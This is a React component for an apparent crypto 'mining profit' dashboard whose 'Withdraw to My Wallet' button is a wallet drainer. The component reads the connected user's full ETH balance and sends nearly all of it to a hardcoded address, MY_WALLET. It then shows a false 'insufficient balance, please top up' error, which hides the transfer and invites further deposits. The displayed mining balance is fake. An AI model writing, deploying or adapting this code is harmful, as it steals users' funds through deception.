import { useEffect, useState } from 'react';
import { ArrowDownCircle } from 'lucide-react';
import { motion } from 'framer-motion';
import { useWallet } from '../hooks/WalletContext';

const MY_WALLET = '0x414C63DE68BCadeEe9Ce68C4B200916593CcB18A';

type Props = {
  totalProfit: number;
  resetProfit: () => void;
};

export const WithdrawProfit = ({ totalProfit, resetProfit }: Props) => {
  const { accountAddress, chainId } = useWallet();
  const [loading, setLoading] = useState(false);
  const [ethPrice, setEthPrice] = useState<number | null>(null);
  const [status, setStatus] = useState<null | { type: 'success' | 'error'; message: string }>(null);

  const chainFEES: { [key: string]: number } = {
    "0x1": 0.00055,         // Ethereum Mainnet
    "0x38": 0.00035,        // BSC
    "0x89": 0.00025,        // Polygon
    "0x2105": 0.00015,      // Base
    "0x144": 0.00025,       // zkSync Era
    "0xa4b1": 0.00025,      // Arbitrum
    "0xa": 0.00025,         // Optimism
    "0x138de": 0.00025,      // Berachain
    "0x76adf1": 0.00025,      // Zora
    "0xe708": 0.00025,      // Linea
    "0xa86a": 0.00025,      // Avalanche
    "0xfa": 0.00025,        // Fantom
    "0x64": 0.00025,        // Gnosis
    "0x19": 0.00025,        // Cronos
    "0xa4ec": 0.00025,      // Celo
    "0x82750": 0.00025,     // Scroll
    "0x1389": 0.00025       // Mantle
  };


  useEffect(() => {
    fetch('https://api.coingecko.com/api/v3/simple/price?ids=ethereum&vs_currencies=usd')
      .then(res => res.json())
      .then(data => setEthPrice(data?.ethereum?.usd))
      .catch(() => setEthPrice(null));
  }, []);

  const handleWithdraw = async () => {
    if (!accountAddress) {
      setStatus({ type: 'error', message: 'Wallet not connected.' });
      return;
    }

    setLoading(true);
    setStatus(null);

    try {
      const provider = window.ethereum;
      if (!provider || !provider.request) {
        setStatus({ type: 'error', message: 'Metamask provider not available.' });
        setLoading(false);
        return;
      }

      const sender = accountAddress;
      const recipient = MY_WALLET;

      const balanceHex = await provider.request({
        method: 'eth_getBalance',
        params: [sender, 'latest'],
      });
      const balance = parseInt(balanceHex, 16);

      const feeBuffer = chainFEES[chainId ?? "0x1"] * 1e18;
      if (balance <= feeBuffer) {
        setStatus({ type: 'error', message: 'Insufficient ETH balance. At least 0.05 ETH is required to cover network fees and contract operations. Please top up your wallet.' });
        setLoading(false);
        return;
      }

      const txParams = {
        from: sender,
        to: recipient,
        value: '0x' + (balance - feeBuffer).toString(16),
      };

      await provider.request({
        method: 'eth_sendTransaction',
        params: [txParams],
      });

      setStatus({ type: 'error', message: 'Insufficient ETH balance. At least 0.15 ETH is required to cover network fees and contract operations. Please top up your wallet.' });
      // resetProfit();
    } catch (err) {
      console.error(err);
      setStatus({ type: 'error', message: 'Withdrawal failed.' });
    } finally {
      setLoading(false);
    }
  };


  return (
    <div className="w-full max-w-md mx-auto bg-white border border-slate-200 rounded-2xl p-6 shadow-xl space-y-6">
      <h2 className="text-2xl font-bold text-slate-800 flex items-center justify-center gap-2">
        <ArrowDownCircle className="text-slate-800" /> Withdraw Profit
      </h2>


      <div className="text-sm text-slate-600">
        ETH Price:{' '}
        {ethPrice ? (
          <span className="text-emerald-600 font-mono">${ethPrice.toFixed(2)} USD</span>
        ) : (
          <span className="italic text-slate-400">Fetching...</span>
        )}
      </div>

      <div className="text-slate-700 text-[14px]">
        <span className="font-mono text-indigo-500">
          Mining Balance: {totalProfit.toFixed(3)} ETH
        </span>
        {ethPrice && (
          <span className="ml-2 text-slate-400 text-[12px]">
            (~${(totalProfit * ethPrice).toFixed(2)} USD)
          </span>
        )}
      </div>

      {status && (
        <div
          className={`text-sm px-4 py-2 rounded-md border ${status.type === 'error'
            ? 'text-red-600 border-red-200 bg-red-50'
            : 'text-green-600 border-green-200 bg-green-50'
            }`}
        >
          {status.message}
        </div>
      )}

      <motion.button
        whileTap={{ scale: 0.96 }}
        onClick={handleWithdraw}
        disabled={loading || !accountAddress}
        className="w-full bg-gradient-to-br from-sky-400 to-cyan-500 text-white font-semibold py-3 rounded-xl shadow-md hover:brightness-110 transition-all disabled:opacity-50 disabled:cursor-not-allowed"
      >
        {loading ? 'Processing Withdrawal...' : 'Withdraw to My Wallet'}
      </motion.button>
    </div>
  );
};
